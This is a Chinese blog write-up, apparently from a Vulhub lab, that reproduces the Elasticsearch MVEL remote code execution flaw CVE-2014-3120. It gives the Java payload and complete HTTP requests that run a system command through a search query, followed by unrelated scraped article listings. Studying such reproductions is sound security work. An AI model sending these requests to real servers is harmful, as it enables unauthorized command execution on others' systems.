ADummy_
ADummy_

ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试

ElasticSearch 命令执行漏洞(CVE-2014-3120)

by ADummy

0x00利用路线

​ Burpsuite抓包—>java代码放入json—>有回显命令执行

0x01漏洞介绍

​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。

MVEL执行命令的代码如下:

import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();

0x02漏洞复现

将Java代码放入json中:

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
  }

首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据:

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

然后,执行任意代码:

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试_第1张图片
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试_第2张图片

你可能感兴趣的:(vulhub_Writeup,安全漏洞,网络安全,渗透测试)

  • 网络安全员证书 黑客KKKing 计算机网络安全网络工程师web安全网络安全
    软考网络安全员证书:信息安全领域的黄金标准随着信息技术的飞速发展,网络安全问题日益凸显,网络安全员的需求也日益增加。软考网络安全员证书作为信息安全领域的黄金标准,对于网络安全从业者来说具有重要意义。本文将详细介绍软考网络安全员证书的背景和意义、获得要求、价值以及备考建议,为有意向参加软考网络安全员证书考试的人员提供参考。一、引言随着网络攻击和数据泄露事件的频繁发生,企业对网络安全人才的需求不断增长
  • 【Burp入门第三十六篇】加解密实现短信轰炸实战案例 秋说 Burp漏洞挖掘
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录背景加解密短信轰炸背景在针对目标应用程序的测试中,发现其密码找回功能存在请求加密机制,具体表现为用户通过手机号获取验证码的请求数据包采用了加密传输:加解密通
  • 【Burp入门第三十三篇】BurpSuite+Proxifier安装配置,实现微信小程序抓包 秋说 BurpSuite渗透工具Proxifier
    BurpSuite是一款功能强大的渗透测试工具,被广泛应用于Web应用程序的安全测试和漏洞挖掘中。本专栏将结合实操及具体案例,带领读者入门、掌握这款漏洞挖掘利器读者可订阅专栏:【Burp由入门到精通|CSDN秋说】文章目录下载配置下载汉化版下载地址:https://get-shell.com/1506.html#hidden-box-comment解压后双击exe文件:
  • 【网络安全 | 扫描子域+发现真实IP】CloakQuest3r安装使用详细教程 秋说 网安渗透工具使用教程(全)web安全子域名扫描渗透工具
    原创文章,禁止转载。本文仅作学习交流使用,不得用于非法渗透,笔者不承担任何责任。文章目录简介功能介绍执行流程限制安装步骤可选功能:SecurityTrailsAPI使用示例简介CloakQuest3r是一款强大的Python工具,专为揭示受Cloudflare及类似服务保护的网站真实IP地址而设计。Cloudflare作为广泛应用的Web安全与性能优化服务,其防护机制可隐藏网站的实际IP,而Clo
  • 【网络安全 | 渗透工具】小程序反编译分析源码 | 图文教程 秋说 网安渗透工具使用教程(全)web安全漏洞挖掘小程序
    未经许可,禁止转载。本文仅供学习使用,严禁用于非法渗透测试,笔者不承担任何责任。文章目录1、下载Proxifier2、下载反编译工具unveilr3、寻找小程序文件包4、对文件包进行反编译5、对源码进行分析6、渗透思路6.1、查找敏感信息泄露6.2、解析加解密逻辑6.3、枚举API接口并测试反编译是通过逆向工程将小程序包还原为接近源代码的形式。这一过程能够帮助我们提取大量有价值的信息,从而辅助漏洞
  • maven项目pom文件以war包方式导入依赖,修改依赖中某个子依赖版本失败 HPF_99 javamavenjava
    在开发中,有一个项目扫描到安全漏洞,要升级jackson版本法一:直接在pom.xml文件中导入完整的依赖com.alibabafastjson2.13.5这样可以直接将原来的依赖修改。如以上方法不行,查看maven库;打包插件是否有问题法二:因pom文件导入的依赖过多,先用idea中maven组件找到依赖来源。找到一个依赖是以jar方式导入,此依赖pom文件中确实导入了jackson,这种的话,
  • 解锁网络防御新思维:D3FEND 五大策略如何对抗 ATT&CK vortex5 网络安全网络安全
    D3FEND简介背景介绍2021年6月22日(美国时间),美国MITRE公司正式发布了D3FEND——一个网络安全对策知识图谱。该项目由美国国家安全局(NSA)资助,并由MITRE的国家安全工程中心(NSEC)负责管理和发布,目前版本为0.9.2-BETA-3。作为广为人知的ATT&CK框架的补充,ATT&CK聚焦于攻击者的战术和技术知识库,而长期以来,网络安全领域一直缺乏一个专门针对防御对策的系
  • 2025年网络安全全景解析:十大趋势、攻防演练与未来挑战(附实战资源) emmm形成中 网络安全web安全安全网络安全
    2025年网络安全全景解析:十大趋势、攻防演练与未来挑战(附实战资源)摘要:2025年网络安全领域正经历前所未有的变革。本文从十大技术趋势、国家级攻防演练(HVV)实战策略、AI驱动的威胁与防御体系等维度深度解析当前安全格局,并附赠零基础到精通的网安学习资源。结合最新法规、技术突破与实战案例,助你掌握攻防核心逻辑,抢占安全制高点![推荐收藏][文末福利]一、2025年网络安全十大核心趋势(附行业影
  • 密码学与网络安全 - 11 密码学Hash函数 shiyivei #密码学与网络安全哈希算法web安全安全Hash函数消息认证
    11密码学Hash函数Hash函数输入长度可变,而输出长度固定合格的Hash函数输出应该均匀分布,看起来随机Hash函数两个要求:1.抗碰撞性(找到两个不同的输入对应相同的输出在计算上不可行),2.单向性(通过Hash值找到输入值在计算上不可行)Hash函数的操作过程:把输入数据的长度填充成固定长度分组的整数倍,填充内容包括原始消息的位长度信息,填充长度信息能够增加攻击者更改数据而要保持hash值
  • NAT和内网穿透 物与我皆无尽也 计算机网络网络服务器运维计算机网络java
    NAT(NetworkAddressTranslation,网络地址转换)是一种广泛应用于计算机网络的技术,其主要目的是为了解决IPv4地址空间的短缺问题,并且增强网络安全。NAT技术允许一个私有网络内的多个设备共享一个或几个全局唯一的公共IP地址访问互联网。1地址划分在A、B、C分类地址,实际上有分公有IP地址和私有IP地址。2NAT当一个私有网络中的设备需要访问互联网时,NAT设备(通常是路由
  • 2024 年综合网络安全审计清单 网络研究观 网络研究观网络安全审计清单分析
    在网络威胁不断演变的时代,确保组织数据和系统的安全至关重要。全面的网络安全审核清单可以在实现这一目标方面发挥关键作用。但是,什么才是有效的网络安全审核清单呢?以及如何对其进行定制以满足您组织的独特需求?了解网络安全审核清单的重要性、前20个基本条目以及如何对其进行自定义以满足您组织的特定要求。关键点了解网络安全审核清单的重要性并探索其中最重要的20个条目。采用主动风险管理、资产和数据管理策略、安全
  • 网络安全清单 网络安全Max web安全智能路由器安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快移除(Deprovisioning)移除(Deprovisioning)是一个除去现存用户帐户的过程,其包括用户帐户登记和设备失效。分布式编码规则(DER:DistinguishedEncodingRules)分布式编码规则(DER)是一个基本编码规则的子集,其提供一个严密的方法来描述任何ASN.1值来作为一个8位字节的字符串。指定网桥(
  • 基于Python的网络漏洞扫描系统的设计与实现 毕设工作室_wlzytw python论文项目python网络开发语言djangotornadodashpygame
    摘要随着互联网不断发展、贴近生活,电子化的生活安全依赖着网络安全。在漏洞泛滥的今天,网络安全状态不容乐观,许多机构都因没有及时处理漏洞导致被恶意入侵,若网络安全保护不当,将会影响现实安全。中小型网络运维人员常因为外部因素影响难以开展网络安全行动。为了应对这一问题,本文研究尝试用Python语言尝试做一个集成漏洞扫描系统的设计与实现。运用以Python为基础的DjangoWeb框架实现快速的业务开发
  • 基于 Python 的漏洞扫描工具的设计与实现 计算机毕业设计指导 python开发语言信息安全
    引言随着信息技术的快速发展,网络安全问题成为了各类组织和个人面临的重要挑战之一。漏洞是网络安全中的一个重要问题,黑客和恶意攻击者往往通过利用这些漏洞来侵入系统,窃取敏感信息或进行其他恶意行为。因此,及时发现和修复漏洞是确保网络安全的重要手段。本项目旨在设计和实现一个基于Python的漏洞扫描工具,帮助用户快速发现系统中的潜在漏洞,并提供修复建议。该工具将包括对Web应用程序、操作系统、服务等的漏洞
  • 每日十个计算机专有名词 (7) 太炀 每日十个计算机专有名词杂项
    Metasploit词源:Meta(超越,超出)+exploit(漏洞利用)Metasploit是一个安全测试框架,用来帮助安全专家(也叫渗透测试人员)发现和利用计算机系统中的漏洞。你可以把它想象成一个工具箱,里面装满了各种可以测试网络和应用程序安全的工具。它有很多预设的“攻击模块”,这些模块可以模拟黑客的攻击方式,帮助你检查自己的系统是否容易受到攻击。通过这些攻击模拟,你可以发现安全漏洞,并及时
  • 计算机网络学编程吗,网络安全要学编程吗 啊倩 计算机网络学编程吗
    网络编程从大的方面说就是对信息的发送到接收,中间传输为物理线路的作用。网络安全要学编程吗?佰佰安全网看看吧。网络安全的任何一项工作,都必须在网络安全组织、网络安全策略、网络安全技术、网络安全运行体系的综合作用下才能取得成效。首先必须有具体的人和组织来承担安全工作,并且赋予组织相应的责权;其次必须有相应的安全策略来指导和规范安全工作的开展,明确应该做什么,不应该做什么,按什么流程和方法来做;再次若有
  • python学习一 星光网络安全社 python学习python网络安全web安全
    学习网络安全为什么要学python?1、在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。2、python是一门编程语言经常用它来写脚本怎么学习python?1、通过本课程能够用python写基本的脚本2、在以后工作中多使用熟练使用那么就让我们先了解一下python
  • 网络安全审计员 网络安全-老纪 web安全网络安全
    在当今数字化时代,随着信息技术的迅猛发展,网络安全问题日益凸显,成为各行各业不容忽视的重要议题。特别是对于企业、政府机构等组织而言,网络安全不仅关乎数据资产的安全,更与组织的声誉、客户信任乃至法律法规的遵从性紧密相连。因此,网络安全审计员这一角色应运而生,他们在保障网络安全方面发挥着举足轻重的作用。网络安全审计员是负责监督和评估组织网络安全状况的专业人员。他们需具备深厚的网络安全知识,包括但不限于
  • 信息安全与网络安全有什么区别? 2401_84297944 程序员web安全网络安全
    信息安全包含哪些内容?1、硬件安全:即网络硬件和存储媒休的安全。要保护这些硬设施不受损害,能够正常工作。2、软件安全:即计算机及其网络r各种软件不被篡改或破坏,不被非法操作或误操作,功能不会失效,不被非法复制。3、运行服务安全:即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测,发现不安全因素能及时报警并采取措施改变不安全状态,保障网络系统正常运
  • CES Asia 2025前瞻:网络安全与数据隐私成焦点 赛逸展张胜 web安全安全
    在数字化转型的浪潮加速奔涌之际,网络安全与数据隐私已然成为企业发展版图中的核心关切。即将盛大启幕的CESAsia2025第七届亚洲消费电子技术贸易展(赛逸展),无疑将汇聚行业目光,成为探讨网络安全与数据隐私领域前沿趋势、创新技术以及法规动态的关键平台。零信任架构的普及走向、数据隐私法规的最新动向,以及量子加密技术蕴含的潜在影响,都备受瞩目,有望在展会上引发广泛关注与深入探讨。零信任架构:网络安全新
  • 网络安全导论PDF 网络安全Ash pdf
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快这份重点是在准备复试时边看书和ppt边手打的。掐指一算已经是整整一个月前的事情惹。这本教材是哈工程复试参考书目,但是网络上关于它的材料比较少。把自己整理的重点放上来,希望能帮到期末、复试以及自学网络安全的小可爱♥网络安全2.1基本协议ARP地址解析协议:将局域网中的32bitIP地址→48bit物理地址(网卡的MAC地址)ARP欺骗:计算
  • 2025年入职/转行网络安全,该如何规划?网络安全职业规划 教网络安全的毛老师 web安全安全网络运维云计算
    网络安全是一个日益增长的行业,对于打算进入或转行进入该领域的人来说,制定一个清晰且系统的职业规划非常重要。2025年,网络安全领域将继续发展并面临新的挑战,包括不断变化的技术、法规要求以及日益复杂的威胁环境。以下是一个关于网络安全职业规划的详细指南,涵盖了从入门到高级岗位的成长路径、技能要求、资源获取等方面的内容。第一部分:网络安全行业概述1.1网络安全的现状与未来网络安全已经成为全球企业和政府的
  • 使用Idea创建springboot项目 奔跑吧邓邓子 SpringBoot深入浅出常见问题解答(FAQ)高效运维javaidea
    提示:“奔跑吧邓邓子”的高效运维专栏聚焦于各类运维场景中的实际操作与问题解决。内容涵盖服务器硬件(如IBMSystem3650M5)、云服务平台(如腾讯云、华为云)、服务器软件(如Nginx、Apache、GitLab、Redis、Elasticsearch、Kubernetes、Docker等)、开发工具(如Git、HBuilder)以及网络安全(如挖矿病毒排查、SSL证书配置)等多个方面。无论
  • 黑客工具介绍 嗨起飞了 网络安全网络安全网络攻击模型
    渗透测试红队工具箱深度解析:6大核心工具实战指南法律声明:本文所有工具及技术仅限用于合法授权的安全测试,使用者需遵守《网络安全法》及相关法律法规,擅自攻击他人系统将承担刑事责任。一、Nmap:网络侦察的全能之眼1.1工具原理剖析Nmap(NetworkMapper)采用TCP/IP协议栈指纹识别技术,通过发送定制化数据包分析响应差异,精准识别主机存活状态、开放端口及服务版本。其脚本引擎(NSE)支
  • VMware NSX 4.2.1.3 下载 - 网络安全虚拟化平台 vmware
    VMwareNSX4.2.1.3-网络安全虚拟化平台构建具有网络连接和安全性的云智能网络,跨多种云环境支持一致的策略、运维和自动化。请访问原文链接:https://sysin.org/blog/vmware-nsx-4/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgVMwareNSX4.2.1.3|10FEB2025|Build24533884VMwareNSX4.2.1.2|
  • 从时间同步到智能调度:TSN时间敏感网络如何提升工厂安全性 光路科技 网络服务器运维
    在当今智能制造蓬勃发展的时代,工业设备和生产系统高度互联,让工厂运营效率显著提升的同时,也让网络安全成为不容忽视的挑战。为了在海量数据传输和实时控制中确保系统的稳定与安全,TSN(时间敏感网络)技术得以应用。它通过严格控制延迟、优化流量调度以及实现精密时间同步,为工业自动化提供了一层坚固的安全屏障。从根本上说,工业安全的关键在于确保各个设备和控制信号的稳定传输。首先,IEEE802.1AS协议以其
  • 塑造网络安全的关键事件 斐夷所非 CyberSecurity网络安全
    注:本文为“网络安全”相关文章合辑。机翻,未校。TimelineofCyberSecurity:KeyEventsthatShapedtheField网络安全时间表:塑造该领域的关键事件October29,2023Cyberattacksareaneverydaythreat,alwayschanging.Theyrangefromsmallhacksbystudentstonation-leve
  • Windows和AD域提权枚举脚本及工具介绍 vortex5 网络安全安全windows
    在Windows和ActiveDirectory(AD)域环境中,权限提升和枚举是渗透测试的关键部分。为了有效进行这些操作,使用特定的工具和脚本可以帮助你识别和利用系统中的漏洞。以下是一些常用于Windows和AD域环境中的权限提升和枚举脚本工具:Windows环境中的提权枚举脚本PowerUp描述:PowerUp是一个PowerShell脚本,专注于在Windows系统中查找权限提升漏洞。它能够
  • 怎么样换手机ip地址?这些方法你知道吗 hgdlip 更换ip地址手机ip智能手机tcp/ip智能路由器
    在当今数字化时代,IP地址作为设备在网络中的唯一标识,对于保护个人隐私、绕过地域限制以及提升网络安全等方面都至关重要。有时候,我们可能需要更换手机的IP地址,以实现特定的网络活动或解决某些网络问题。本文将详细介绍如何更换手机的IP地址,帮助读者轻松掌握这一技能。‌一、了解IP地址‌首先,我们需要明确什么是IP地址。IP地址是互联网协议地址(InternetProtocolAddress)的缩写,它
  • JeeWMS graphReportController.do SQL注入漏洞复现(CVE-2025-0392) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:JeeWMS是一款基于JavaEE企业级架构开发的开源仓库管理系统(WMS),专为优化仓储管理和物流操作而设计。它支持多仓库、多货主
  • java数字签名三种方式 知了ing javajdk
    以下3钟数字签名都是基于jdk7的 1,RSA String password="test"; // 1.初始化密钥 KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA"); keyPairGenerator.initialize(51
  • Hibernate学习笔记 caoyong Hibernate
    1>、Hibernate是数据访问层框架,是一个ORM(Object Relation Mapping)框架,作者为:Gavin King 2>、搭建Hibernate的开发环境      a>、添加jar包:      aa>、hibernatte开发包中/lib/required/所
  • 设计模式之装饰器模式Decorator(结构型) 漂泊一剑客 Decorator
    1. 概述        若你从事过面向对象开发,实现给一个类或对象增加行为,使用继承机制,这是所有面向对象语言的一个基本特性。如果已经存在的一个类缺少某些方法,或者须要给方法添加更多的功能(魅力),你也许会仅仅继承这个类来产生一个新类—这建立在额外的代码上。      
  • 读取磁盘文件txt,并输入String 一炮送你回车库 String
    public static void main(String[] args) throws IOException {    String fileContent = readFileContent("d:/aaa.txt");    System.out.println(fileContent);   
  • js三级联动下拉框 3213213333332132 三级联动
    //三级联动 省/直辖市<select id="province"></select> 市/省直辖<select id="city"></select> 县/区 <select id="area"></select>
  • erlang之parse_transform编译选项的应用 616050468 parse_transform游戏服务器属性同步abstract_code
             最近使用erlang重构了游戏服务器的所有代码,之前看过C++/lua写的服务器引擎代码,引擎实现了玩家属性自动同步给前端和增量更新玩家数据到数据库的功能,这也是现在很多游戏服务器的优化方向,在引擎层面去解决数据同步和数据持久化,数据发生变化了业务层不需要关心怎么去同步给前端。由于游戏过程中玩家每个业务中玩家数据更改的量其实是很少
  • JAVA JSON的解析 darkranger java
    // { // “Total”:“条数”, // Code: 1, // // “PaymentItems”:[ // { // “PaymentItemID”:”支款单ID”, // “PaymentCode”:”支款单编号”, // “PaymentTime”:”支款日期”, // ”ContractNo”:”合同号”, //
  • POJ-1273-Drainage Ditches aijuans ACM_POJ
    POJ-1273-Drainage Ditches http://poj.org/problem?id=1273 基本的最大流,按LRJ的白书写的 #include<iostream> #include<cstring> #include<queue> using namespace std; #define INF 0x7fffffff int ma
  • 工作流Activiti5表的命名及含义 atongyeye 工作流Activiti
    activiti5 - http://activiti.org/designer/update在线插件安装 activiti5一共23张表 Activiti的表都以ACT_开头。 第二部分是表示表的用途的两个字母标识。 用途也和服务的API对应。 ACT_RE_*: 'RE'表示repository。 这个前缀的表包含了流程定义和流程静态资源 (图片,规则,等等)。 A
  • android的广播机制和广播的简单使用 百合不是茶 android广播机制广播的注册
          Android广播机制简介 在Android中,有一些操作完成以后,会发送广播,比如说发出一条短信,或打出一个电话,如果某个程序接收了这个广播,就会做相应的处理。这个广播跟我们传统意义中的电台广播有些相似之处。之所以叫做广播,就是因为它只负责“说”而不管你“听不听”,也就是不管你接收方如何处理。另外,广播可以被不只一个应用程序所接收,当然也可能不被任何应
  • Spring事务传播行为详解 bijian1013 javaspring事务传播行为
            在service类前加上@Transactional,声明这个service所有方法需要事务管理。每一个业务方法开始时都会打开一个事务。         Spring默认情况下会对运行期例外(RunTimeException)进行事务回滚。这
  • eidtplus operate 征客丶 eidtplus
    开启列模式: Alt+C 鼠标选择   OR   Alt+鼠标左键拖动 列模式替换或复制内容(多行): 右键-->格式-->填充所选内容-->选择相应操作 OR Ctrl+Shift+V(复制多行数据,必须行数一致) -------------------------------------------------------
  • 【Kafka一】Kafka入门 bit1129 kafka
    这篇文章来自Spark集成Kafka(http://bit1129.iteye.com/blog/2174765),这里把它单独取出来,作为Kafka的入门吧   下载Kafka http://mirror.bit.edu.cn/apache/kafka/0.8.1.1/kafka_2.10-0.8.1.1.tgz 2.10表示Scala的版本,而0.8.1.1表示Kafka
  • Spring 事务实现机制 BlueSkator spring代理事务
    Spring是以代理的方式实现对事务的管理。我们在Action中所使用的Service对象,其实是代理对象的实例,并不是我们所写的Service对象实例。既然是两个不同的对象,那为什么我们在Action中可以象使用Service对象一样的使用代理对象呢?为了说明问题,假设有个Service类叫AService,它的Spring事务代理类为AProxyService,AService实现了一个接口
  • bootstrap源码学习与示例:bootstrap-dropdown(转帖) BreakingBad bootstrapdropdown
    bootstrap-dropdown组件是个烂东西,我读后的整体感觉。 一个下拉开菜单的设计: <ul class="nav pull-right"> <li id="fat-menu" class="dropdown">
  • 读《研磨设计模式》-代码笔记-中介者模式-Mediator bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 中介者模式(Mediator):用一个中介对象来封装一系列的对象交互。 * 中介者使各对象不需要显式地相互引用,从而使其耦合松散,而且可以独立地改变它们之间的交互。 * * 在我看来,Mediator模式是把多个对象(
  • 常用代码记录 chenjunt3 UIExcelJ#
      1、单据设置某行或某字段不能修改 //i是行号,"cash"是字段名称 getBillCardPanelWrapper().getBillCardPanel().getBillModel().setCellEditable(i, "cash", false); //取得单据表体所有项用以上语句做循环就能设置整行了 getBillC
  • 搜索引擎与工作流引擎 comsci 算法工作搜索引擎网络应用
          最近在公司做和搜索有关的工作,(只是简单的应用开源工具集成到自己的产品中)工作流系统的进一步设计暂时放在一边了,偶然看到谷歌的研究员吴军写的数学之美系列中的搜索引擎与图论这篇文章中的介绍,我发现这样一个关系(仅仅是猜想)   -----搜索引擎和流程引擎的基础--都是图论,至少像在我在JWFD中引擎算法中用到的是自定义的广度优先
  • oracle Health Monitor daizj oracleHealth Monitor
    About Health Monitor Beginning with Release 11g, Oracle Database includes a framework called Health Monitor for running diagnostic checks on the database. About Health Monitor Checks Health M
  • JSON字符串转换为对象 dieslrae javajson
        作为前言,首先是要吐槽一下公司的脑残编译部署方式,web和core分开部署本来没什么问题,但是这丫居然不把json的包作为基础包而作为web的包,导致了core端不能使用,而且我们的core是可以当web来用的(不要在意这些细节),所以在core中处理json串就是个问题.没办法,跟编译那帮人也扯不清楚,只有自己写json的解析了.   
  • C语言学习八结构体,综合应用,学生管理系统 dcj3sjt126com C语言
    实现功能的代码: # include <stdio.h> # include <malloc.h> struct Student { int age; float score; char name[100]; }; int main(void) { int len; struct Student * pArr; int i,
  • vagrant学习笔记 dcj3sjt126com vagrant
    想了解多主机是如何定义和使用的, 所以又学习了一遍vagrant   1. vagrant virtualbox 下载安装 https://www.vagrantup.com/downloads.html https://www.virtualbox.org/wiki/Downloads   查看安装在命令行输入vagrant     2.
  • 14.性能优化-优化-软件配置优化 frank1234 软件配置性能优化
    1.Tomcat线程池 修改tomcat的server.xml文件: <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" maxThreads="1200" m
  • 一个不错的shell 脚本教程 入门级 HarborChung linuxshell
    一个不错的shell 脚本教程 入门级 建立一个脚本   Linux中有好多中不同的shell,但是通常我们使用bash (bourne again shell) 进行shell编程,因为bash是免费的并且很容易使用。所以在本文中笔者所提供的脚本都是使用bash(但是在大多数情况下,这些脚本同样可以在 bash的大姐,bourne shell中运行)。   如同其他语言一样
  • Spring4新特性——核心容器的其他改进 jinnianshilongnian spring动态代理spring4依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • Linux设置tomcat开机启动 liuxingguome tomcatlinux开机自启动
    执行命令sudo gedit /etc/init.d/tomcat6 然后把以下英文部分复制过去。(注意第一句#!/bin/sh如果不写,就不是一个shell文件。然后将对应的jdk和tomcat换成你自己的目录就行了。 #!/bin/bash # # /etc/rc.d/init.d/tomcat # init script for tomcat precesses
  • 第13章 Ajax进阶(下) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Troubleshooting Crystal Reports off BW blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Troubleshooting+Crystal+Reports+off+BW#TroubleshootingCrystalReportsoffBW-TracingBOE   Quite useful, especially this part: SAP BW connectivity For t
  • Java开发熟手该当心的11个错误 tomcat_oracle javajvm多线程单元测试
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
  • 正则表达式大全 yang852220741 html编程正则表达式
    今天向大家分享正则表达式大全,它可以大提高你的工作效率 正则表达式也可以被当作是一门语言,当你学习一门新的编程语言的时候,他们是一个小的子语言。初看时觉得它没有任何的意义,但是很多时候,你不得不阅读一些教程,或文章来理解这些简单的描述模式。 一、校验数字的表达式 数字:^[0-9]*$ n位的数字:^\d{n}$ 至少n位的数字:^\d{n,}$ m-n位的数字:^\d{m,n}$
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他